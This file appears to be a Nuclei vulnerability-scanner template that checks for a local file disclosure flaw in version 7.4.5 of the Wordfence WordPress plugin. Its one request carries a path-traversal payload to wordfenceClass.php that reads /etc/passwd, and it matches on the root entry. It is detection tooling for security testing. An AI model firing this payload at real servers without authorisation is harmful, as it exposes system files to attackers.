id: wordpress-wordfence-lfi
info:
  name: Wordpress Plugin wordfence.7.4.5 - Local File Disclosure
  author: 0x_Akoko
  severity: high
  reference:
    - https://www.exploit-db.com/exploits/48061
    - https://www.nmmapper.com/st/exploitdetails/48061/42367/wordpress-plugin-wordfence745-local-file-disclosure/
  tags: wordpress,wp-plugin,lfi,wordfence

requests:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/wordfence/lib/wordfenceClass.php?file=/../../../../../../etc/passwd"

    matchers-condition: and
    matchers:

      - type: regex
        regex:
          - "root:.*:0:0"

      - type: status
        status:
          - 200
